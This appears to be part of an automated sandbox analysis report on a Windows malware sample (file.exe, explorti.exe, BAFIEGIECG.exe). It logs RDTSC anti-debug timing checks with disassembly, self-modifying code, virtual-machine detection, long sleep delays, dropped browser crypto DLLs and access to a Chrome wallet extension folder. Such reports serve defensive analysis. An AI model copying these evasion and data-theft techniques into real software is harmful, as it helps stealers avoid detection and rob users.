Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4C50D66 second address: 4C50DAF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ecx 0x00000005 pushfd 0x00000006 jmp 00007FF698BF10D3h 0x0000000b or ax, 06EEh 0x00000010 jmp 00007FF698BF10D9h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 mov esp, ebp 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e mov edx, 53B3944Eh 0x00000023 mov si, di 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4C50DAF second address: 4C50DB5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4C50DB5 second address: 4C50DB9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4C50DB9 second address: 4C50DD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FF698E1E1B5h 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4C50DD9 second address: 4C50DDF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4C50DDF second address: 4C50DE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4C50DE3 second address: 4C50DE7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4C60E96 second address: 4C60E9C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4C60E9C second address: 4C60EA2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4C60EA2 second address: 4C60EA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4C60EA6 second address: 4C60EAA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4C60EAA second address: 4C60EE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushad 0x0000000b jmp 00007FF698E1E1ABh 0x00000010 call 00007FF698E1E1B8h 0x00000015 pop esi 0x00000016 popad 0x00000017 mov esi, edi 0x00000019 popad 0x0000001a xchg eax, ebp 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4C60EE4 second address: 4C60EFA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF698BF10D2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4C60EFA second address: 4C60F02 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, dx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4C60F02 second address: 4C60F21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov ebp, esp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FF698BF10D4h 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4C60F21 second address: 4C60F27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4C60F27 second address: 4C60F2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4C60F2B second address: 4C60F2F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4C60B76 second address: 4C60B7A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4C60B7A second address: 4C60B80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4C60B80 second address: 4C60B96 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF698BF10D2h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4C60B96 second address: 4C60B9A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4C60B9A second address: 4C60BE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a mov ebx, 02237CF0h 0x0000000f pushfd 0x00000010 jmp 00007FF698BF10D9h 0x00000015 or ecx, 05AB5A76h 0x0000001b jmp 00007FF698BF10D1h 0x00000020 popfd 0x00000021 popad 0x00000022 mov ebp, esp 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 movsx ebx, cx 0x0000002a mov ebx, ecx 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4C60BE7 second address: 4C60C4E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FF698E1E1B7h 0x00000009 and si, B05Eh 0x0000000e jmp 00007FF698E1E1B9h 0x00000013 popfd 0x00000014 jmp 00007FF698E1E1B0h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c pop ebp 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007FF698E1E1B7h 0x00000024 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4CD001B second address: 4CD006E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF698BF10D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f pushfd 0x00000010 jmp 00007FF698BF10D9h 0x00000015 xor cl, 00000026h 0x00000018 jmp 00007FF698BF10D1h 0x0000001d popfd 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4CD006E second address: 4CD0074 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4CD0074 second address: 4CD00CA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF698BF10D3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FF698BF10CFh 0x00000013 and eax, 13AA320Eh 0x00000019 jmp 00007FF698BF10D9h 0x0000001e popfd 0x0000001f movzx eax, di 0x00000022 popad 0x00000023 xchg eax, ebp 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4CD00CA second address: 4CD00CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4CD00CE second address: 4CD00D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4CD00D2 second address: 4CD00D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4CD00D8 second address: 4CD0119 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF698BF10D7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov dh, 77h 0x00000010 pushfd 0x00000011 jmp 00007FF698BF10CCh 0x00000016 sbb si, 9618h 0x0000001b jmp 00007FF698BF10CBh 0x00000020 popfd 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4CD0119 second address: 4CD016F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FF698E1E1AFh 0x00000009 xor eax, 3C42EADEh 0x0000000f jmp 00007FF698E1E1B9h 0x00000014 popfd 0x00000015 mov si, 21A7h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c pop ebp 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007FF698E1E1B9h 0x00000024 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4CC0EDA second address: 4CC0EE0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4CC0EE0 second address: 4CC0EE6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4CC0EE6 second address: 4CC0EEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4C702C3 second address: 4C702D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF698E1E1B1h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4CD03E0 second address: 4CD040F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF698BF10CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 movzx eax, al 0x0000000c jmp 00007FF698BF10D6h 0x00000011 pop ebp 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4CD040F second address: 4CD0413 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4CD0413 second address: 4CD0419 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 61AD20 second address: 61AD5B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF698E1E1B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FF698E1E1B9h 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 617FD3 second address: 617FDD instructions: 0x00000000 rdtsc 0x00000002 ja 00007FF698BF10C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4C80538 second address: 4C8054B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF698E1E1AFh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4C8054B second address: 4C8054F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4C8054F second address: 4C8055F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4C8055F second address: 4C80565 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	Special instruction interceptor: First address: 45E72A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	Special instruction interceptor: First address: 45E81A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	Special instruction interceptor: First address: 633FE7 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	Special instruction interceptor: First address: 696C15 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	Special instruction interceptor: First address: 606F4D instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Special instruction interceptor: First address: A1E72A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Special instruction interceptor: First address: A1E81A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Special instruction interceptor: First address: BF3FE7 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Special instruction interceptor: First address: C56C15 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Special instruction interceptor: First address: BC6F4D instructions caused by: Self-modifying code

Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe

Code function: 10_2_04CD0ADC rdtsc

10_2_04CD0ADC

Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe

Thread delayed: delay time: 180000

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe	Window / User API: threadDelayed 1694	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Window / User API: threadDelayed 2384	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Window / User API: threadDelayed 4121	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Window / User API: threadDelayed 408	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Window / User API: threadDelayed 4126	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\7873c16243.exe	Window / User API: threadDelayed 700	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Users\user\Desktop\file.exe

API coverage: 0.8 %

Source: C:\Users\user\Desktop\file.exe TID: 3852	Thread sleep count: 70 > 30	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 2324	Thread sleep count: 42 > 30	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 2324	Thread sleep time: -42000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 2420	Thread sleep count: 32 > 30	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 2420	Thread sleep time: -32000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 1132	Thread sleep count: 70 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 1132	Thread sleep time: -140070s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 3756	Thread sleep count: 69 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 3756	Thread sleep time: -138069s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 3164	Thread sleep count: 65 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 3164	Thread sleep time: -130065s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 1476	Thread sleep count: 4121 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 1476	Thread sleep time: -8246121s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 2548	Thread sleep count: 408 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 2548	Thread sleep time: -12240000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 2716	Thread sleep time: -180000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 1476	Thread sleep count: 126 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 1476	Thread sleep time: -252126s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 1212	Thread sleep count: 4126 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 1212	Thread sleep time: -8256126s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\7873c16243.exe TID: 6972	Thread sleep count: 700 > 30	Jump to behavior

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C9CC930 GetSystemInfo,VirtualAlloc,GetSystemInfo,VirtualFree,VirtualAlloc,

0_2_6C9CC930

Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Thread delayed: delay time: 30000			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Thread delayed: delay time: 180000			Jump to behavior

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior

Source: file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp	Binary or memory string: 3Windows 2012 Server Standard without Hyper-V (core)
Source: file.exe, file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp	Binary or memory string: Windows 11 Essential Server Solutions without Hyper-V
Source: file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp	Binary or memory string: #Windows 10 Microsoft Hyper-V Server
Source: file.exe, file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp	Binary or memory string: Windows 8.1 Microsoft Hyper-V Server
Source: file.exe, file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp	Binary or memory string: Windows 2012 Server Standard without Hyper-V
Source: file.exe, file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp	Binary or memory string: Windows 8 Microsoft Hyper-V Server
Source: file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp	Binary or memory string: 3Windows 11 Server Enterprise without Hyper-V (full)
Source: file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp	Binary or memory string: 5Windows 2012 Server Datacenter without Hyper-V (core)
Source: file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp	Binary or memory string: 3Windows 2016 Server Standard without Hyper-V (core)
Source: file.exe, file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp	Binary or memory string: Windows 8.1 Server Standard without Hyper-V (core)
Source: KJEBKJDA.0.dr	Binary or memory string: global block list test formVMware20,11696487552
Source: KJEBKJDA.0.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp	Binary or memory string: 3Windows 11 Server Enterprise without Hyper-V (core)
Source: file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp	Binary or memory string: (Windows 2012 R2 Microsoft Hyper-V Server
Source: file.exe, file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp	Binary or memory string: Windows 11 Microsoft Hyper-V Server
Source: file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp	Binary or memory string: 6Windows 2012 R2 Server Standard without Hyper-V (core)
Source: file.exe, file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp	Binary or memory string: Windows 2012 R2 Server Standard without Hyper-V
Source: file.exe, file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp	Binary or memory string: Windows 8 Server Datacenter without Hyper-V (core)
Source: file.exe, file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp	Binary or memory string: Windows 10 Server Datacenter without Hyper-V (core)
Source: Amcache.hve.8.dr	Binary or memory string: vmci.sys
